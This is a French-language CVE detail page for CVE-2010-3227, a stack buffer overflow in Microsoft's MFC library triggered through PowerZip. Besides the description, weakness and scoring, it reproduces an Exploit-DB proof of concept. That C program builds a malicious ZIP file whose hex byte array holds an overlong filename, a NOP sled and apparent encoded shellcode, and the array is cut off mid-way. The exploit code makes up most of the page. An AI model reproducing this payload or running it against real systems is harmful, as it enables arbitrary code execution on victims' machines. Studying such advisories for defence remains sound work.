CVE-2010-3227 : Détail

CVE-2010-3227

Overflow
71.91%V3
Network
2010-10-26 19:00 +00:00
2018-10-12 17:57 +00:00

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

Stack-based buffer overflow in the UpdateFrameTitleForDocument method in the CFrameWnd class in mfc42.dll in the Microsoft Foundation Class (MFC) Library in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows context-dependent attackers to execute arbitrary code via a long window title that this library attempts to create at the request of an application, as demonstrated by the Trident PowerZip 7.2 Build 4010 application, aka "Windows MFC Document Title Updating Buffer Overflow Vulnerability."

Informations

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 13921

Date de publication : 2010-06-17 22:00 +00:00
Auteur : fl0 fl0w
EDB Vérifié : Yes

/* DISCLAIMER THIS PROGRAM IS NOT INTENDED TO BE USED ON OTHER COMPUTERS AND IT IS DESTINED FOR PERSONAL RESEARCH ONLY!!!! The programs are provided as is without any guarantees or warranty. The author is not responsible for any damage or losses of any kind caused by the use or misuse of the programs. The author is under no obligation to provide support, service, corrections, or upgrades to the free software programs. Author: fl0 fl0w Software: PowerZip Dl link: http://www.powerzip.biz/down.aspx/PowerZipSetup.exe Afected Versions: 7.21 (Build 4010) Remote: No Local: Yes Class: Boundary Condition Error Bug: Stack buffer overflow Exploitable: No because it makes a exit call Afected software: Windows 7, Windows Vista, Windows XP, Windows 2000, Windows Me, Windows 98 or Windows NT 4.0 Fix: No fix Compiler: gcc version 3.4.4 (cygming special, gdc 0.12, using dmd 0.125) Advice: To avoid any problems under Windows use cygwin console. Play with the file and maybe you can get other exception. The .C code: */ #include<stdio.h> #define FILENAME "Zpoc.zip" #define VER "7.21 (Build 4010)" #define POCNAME "-PowerZip buffer overflow PoC" VER "\n-File built!!" #define CHAR_SIZE 1 #define ZFILE "\x50\x4b\x03\x04\x14\x00\x00\x00\x00\x00\xb7\xac\xce\x34\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x14\x08\x00\x00\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x66\x66\x64\x73\x75\x69\x62\x7a\x65\x6f\x69\x76" \ "\x7a\x20\x66\x68\x65\x6f\x20\x79\x66\x6f\x7a\x69\x61\x71\x20\x6f\x69\x65\x61\x7a" \ "\x75\x20\x7a\x71\x6f\x66\x68\x75\x65\x7a\x71\x6f\x69\x65\x6e\x66\x65\x7a\x6a\x75" \ "\x71\x63\x62\x75\x71\x70\x7a\x61\x7a\x69\x27\x74\x75\x72\x65\x6f\x7a\x6e\x62\x69" \ "\x6a\x75\x76\x62\x67\x73\x64\x75\x69\x71\x79\x72\x7a\x61\x6a\x20\x62\x63\x73\x64" \ "\x6f\x70\x69\x75\x72\x79\x7a\x6f\x65\x61\x71\x6e\x62\x69\x6f\x64\x73\x79\x72\x66" \ "\x65\x7a\x71\x6f\x69\x70\x62\x75\x66\x63\x73\x71\x69\x75\x79\x72\x61\x7a\x62\x69" \ "\x6a\x65\x66\x62\x68\x73\x75\x69\x71\x76\x64\x73\x71\x69\x6a\x62\x66\x65\x7a\x71" \ "\x75\x61\x66\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64" \ "\x64\x64\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x75\x75\x75" \ "\x75\x75\x75\x75\x75\x75\x75\x75\x68\x76\x71\x24\x69\x66\x72\x7a\x65\x6f\x62\x76" \ "\x69\x6f\x7a\x65\x71\x66\x74\x72\x65\x6f\x7a\x71\x6a\x6e\x62\x76\x64\x73\x70\x69" \ "\x79\x75\x66\x71\x6f\x65\x69\x68\x66\x72\x6f\x75\x65\x7a\x68\x61\x72\x62\x20\x69" \ "\x76\x66\x64\x73\x70\x6f\x68\x6a\x72\x65\x71\x6f\x75\x68\x66\x7a\x65\x61\x71\x75" \ "\x68\x76\x71\x6f\x75\x68\x65\x66\x6f\x71\x73\x69\x6a\x68\x64\x6f\x73\x71\x68\x76" \ "\x64\x6f\x69\x68\x7a\x61\x71\x6f\x65\x69\x68\x66\x64\x73\x6f\x69\x75\x68\x76\x63" \ "\x78\x77\x69\x75\x68\x66\x71\x6f\x75\x69\x68\x76\x77\x78\x6f\x69\x68\x66\x64\x73" \ "\x71\x6f\x69\x68\x76\x64\x73\x71\x6f\x69\x75\x68\x7a\x67\x66\x6f\x69\x68\x73\x64" \ "\x71\x6f\x69\x75\x68\x67\x7a\x65\x71\x6f\x69\x68\x67\x73\x71\x6f\x69\x68\x67\x7a" \ "\x61\x65\x7a\x72\x75\x79\x61\x75\x79\x74\x61\x65\x70\x69\x75\x79\x55\x59\x54\x4f" \ "\x5a\x52\x45\x50\x49\x48\x47\x41\x5a\x55\x59\x56\x44\x53\x4f\x49\x59\x54\x41\x50" \ "\x4f\x49\x55\x45\x59\x52\x49\x55\x45\x5a\x59\x47\x42\x4b\x4a\x43\x58\x4e\x4b\x56" \ "\x4e\x4b\x43\x58\x42\x57\x56\x4b\x4a\x4e\x42\x43\x58\x48\x42\x4b\x4a\x44\x48\x46" \ "\x4f\x49\x48\x5a\x45\x52\x4f\x49\x55\x48\x45\x5a\x55\x49\x4f\x41\x42\x45\x5a\x55" \ "\x49\x42\x47\x55\x49\x56\x43\x50\x4c\x44\x53\x47\x57\x4b\x52\x54\x42\x4e\x49\x55" \ "\x43\x49\x55\x4f\x51\x45\x42\x48\x52\x55\x49\x59\x44\x46\x51\x50\x5a\x49\x55\x45" \ "\x52\x50\x49\x55\x44\x59\x46\x54\x50\x41\x49\x5a\x55\x45\x59\x52\x5a\x45\x55\x48" \ "\x52\x54\x49\x55\x50\x56\x58\x57\x4b\x4a\x43\x4e\x48\x42\x47\x50\x46\x4f\x49\x55" \ "\x50\x41\x49\x52\x59\x45\x5a\x4f\x41\x49\x54\x59\x38\x37\x33\x32\x39\x35\x36\x35" \ "\x39\x34\x38\x33\x32\x36\x35\x46\x53\x34\x38\x59\x46\x44\x53\x39\x38\x59\x55\x56" \ "\x47\x30\x39\x38\x51\x59\x55\x52\x30\x39\x38\x34\x59\x35\x32\x33\x39\x38\x41\x59" \ "\x39\x46\x38\x45\x51\x59\x5a\x35\x39\x38\x59\x36\x39\x38\x46\x47\x59\x39\x38\x51" \ "\x59\x39\x47\x46\x44\x53\x55\x59\x30\x39\x48\x34\x5a\x48\x33\x37\x38\x35\x32\x33" \ "\x31\x42\x34\x47\x38\x30\x47\x46\x44\x53\x55\x49\x42\x56\x51\x49\x55\x4f\x59\x50" \ "\x52\x39\x5a\x48\x46\x44\x53\x51\x55\x49\x47\x46\x47\x44\x55\x53\x53\x53\x53\x53" \ "\x45\x47\x46\x39\x32\x47\x35\x33\x34\x55\x47\x46\x39\x49\x53\x50\x47\x42\x55\x54" \ "\x50\x5a\x39\x38\x59\x35\x33\x41\x41\x42\x43\x43\x46\x52\x45\x43\x43\x45\x54\x52" \ "\x45\x5a\x47\x52\x46\x44\x53\x49\x4f\x5a\x48\x45\x52\x42\x4e\x4f\x56\x46\x44\x53" \ "\x4f\x49\x52\x48\x54\x4f\x5a\x49\x4e\x46\x47\x44\x4b\x4e\x46\x43\x58\x4c\x4b\x59" \ "\x89\x05\x8a\x9b\x98\x98\x98\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36" \ "\x33\x30\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32" \ "\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44" \ "\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e\x4d\x54\x4a" \ "\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38\x4e\x46\x46\x42\x46\x42\x4b" \ "\x58\x45\x44\x4e\x43\x4b\x38\x4e\x37\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f" \ "\x34\x4a\x51\x4b\x38\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b" \ "\x58\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c\x46\x37\x47" \ "\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x35\x46" \ "\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b" \ "\x58\x4e\x50\x4b\x54\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b" \ "\x58\x49\x48\x4e\x56\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d\x46\x56\x4b" \ "\x48\x43\x44\x42\x53\x4b\x48\x42\x44\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a\x4b" \ "\x48\x42\x44\x4a\x30\x50\x45\x4a\x36\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f" \ "\x4f\x48\x4d\x48\x46\x43\x45\x48\x56\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x37\x43" \ "\x37\x44\x43\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e\x4e\x4f\x4b" \ "\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a" \ "\x50\x44\x30\x45\x35\x4c\x36\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45" \ "\x4f\x4d\x4a\x47\x45\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43" \ "\x54\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x41\x4e\x45\x48" \ "\x56\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a\x4c\x31\x42\x57\x47\x4c\x47" \ "\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46" \ "\x4a\x4d\x4a\x50\x32\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42" \ "\x4d\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d\x42\x35\x46" \ "\x55\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x36\x47\x4e\x49\x47\x48\x4c\x49" \ "\x57\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x36\x48" \ "\x36\x4a\x56\x43\x46\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x45\x49\x35\x49\x32\x4e" \ "\x4c\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c" \ "\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x34\x4e\x52\x43\x39\x4d\x38\x4c\x37\x4a" \ "\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45" \ "\x37\x46\x44\x4f\x4f\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4c" \ "\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46\x4d\x4a\x49" \ "\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36\x4f\x4f\x4f\x4f\x47\x43\x4f" \ "\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44" \ "\x45\x4f\x4f\x42\x4d\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48" \ "\x4d\x4f\x4f\x42\x4d\x5a\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61\x82\xfd" \ "\x81\x98\x98\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x2e\x74\x78\x74\x50\x4b" \ "\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xb7\xac\xce\x34\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x14\x08\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00\x00" \ "\x00\x00\x00\x00\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x41\x41\x41\x41" \ "\x58\x58\x58\x58\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" \ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x44\x44\x44\x44\x44\x44\x44\x44\x44" \ "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x45\x45\x45\x45\x45\x45\x45\x45" \ "\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x43" \ "\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x41" \ "\x42\x43\x44\x45\x58\x58\x58\x58\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90" \ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc9\x83\xe9\xb0" \ "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac" \ "\xe0\x11\xdd\xb8\x73\x05\x6f\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28" \ "\x8b\x15\x1b\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09\xfc" \ "\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8\x25\x6f\x71\xcf\x74" \ "\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93" \ "\xbb\x21\xf4\xdb\xc9\xca\x1b\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e" \ "\x84\x16\xc0\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40\x38" \ "\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92\x05\xe0\xf8\x6f\x80" \ "\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36" \ "\xe2\xeb\xcc\x36\xd9\x73\x71\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05" \ "\x75\x2a\xf8\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9\x07" \ "\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7\xaf\x5c\xaf\x6f\x80" \ "\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2" \ "\xbb\x3a\x63\xfa\x74\xb8\xbd\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae" \ "\x39\xec\x6f\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1\xaf" \ "\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40\xdb\xdd\x06\x13\x94" \ "\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3\x03\x75\x2c\x6f\x80\x8a\xfa\x90\x00" \ "\x69\x4a\x58\x43\x53\x35\x70\x43\x4b\x4e\x70\x4f\x78\x4a\x4f\x38\x4e\x6b\x30\x43" \ "\x30\x63\x38\x65\x48\x4b\x4e\x71\x7a\x7a\x6e\x50\x57\x39\x6f\x79\x57\x31\x53\x42" \ "\x4d\x6f\x74\x6e\x4e\x61\x55\x51\x68\x61\x55\x6b\x70\x4e\x4f\x70\x63\x6b\x70\x52" \ "\x4e\x4f\x75\x71\x64\x6d\x50\x52\x55\x70\x73\x71\x55\x50\x72\x6d\x50\x25\x73\x6b" \ "\x70\x25\x73\x6d\x50\x6e\x4f\x51\x31\x4f\x54\x4e\x64\x6f\x30\x6d\x56\x4d\x56\x4d" \ "\x50\x70\x6e\x4f\x75\x72\x54\x4d\x50\x30\x6c\x42\x4f\x71\x53\x33\x31\x50\x6c\x43" \ "\x37\x70\x72\x70\x6f\x62\x55\x30\x70\x6b\x70\x6f\x51\x6f\x74\x50\x6d\x6f\x79\x50" \ "\x6e\x31\x59\x54\x33\x70\x74\x54\x32\x61\x51\x50\x74\x70\x6f\x31\x62\x42\x53\x6b" \ "\x70\x25\x73\x4d\x50\x4e\x4f\x4f\x51\x61\x34\x6f\x54\x6b\x50\x41\x00\x4b\x38\x4f" \ "\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58\x41\x50\x50\x4e\x41" \ "\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d" \ "\x30\x41\x30\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45" \ "\x4e\x4b\x48\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54\x4b" \ "\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x58\x49\x48\x4e\x56\x46" \ "\x32\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d\x46\x56\x4b\x48\x43\x44\x42\x53\x4b" \ "\x48\x42\x44\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50" \ "\x45\x4a\x36\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46\x43" \ "\x45\x48\x56\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x37\x43\x37\x44\x43\x4f\x55\x46" \ "\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48" \ "\x4d\x4f\x45\x49\x58\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c" \ "\x36\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45\x4f" \ "\x4f\x48\x4d\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43\x54\x43\x55\x43\x54\x43" \ "\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x41\x4e\x45\x48\x56\x43\x45\x49\x48\x41" \ "\x4e\x45\x59\x4a\x46\x46\x4a\x4c\x31\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c" \ "\x36\x42\x41\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32\x49" \ "\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x45\x4e\x49" \ "\x54\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d\x42\x35\x46\x55\x46\x55\x45\x55\x4f" \ "\x4f\x42\x4d\x43\x39\x4a\x36\x47\x4e\x49\x47\x48\x4c\x49\x57\x47\x45\x4f\x4f\x48" \ "\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x36\x48\x36\x4a\x56\x43\x46\x4d" \ "\x36\x49\x48\x45\x4e\x4c\x46\x42\x45\x49\x35\x49\x32\x4e\x4c\x49\x38\x47\x4e\x4c" \ "\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d" \ "\x32\x50\x4f\x44\x34\x4e\x52\x43\x39\x4d\x38\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b" \ "\x4a\x4a\x56\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f\x48" \ "\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4c\x36\x41\x30\x41\x55\x41" \ "\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43" \ "\x55\x4f\x4f\x48\x4d\x4c\x36\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47" \ "\x45\x4e\x4f\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d\x4a" \ "\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61\x82\xfd\x81\x98\x98\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" \ 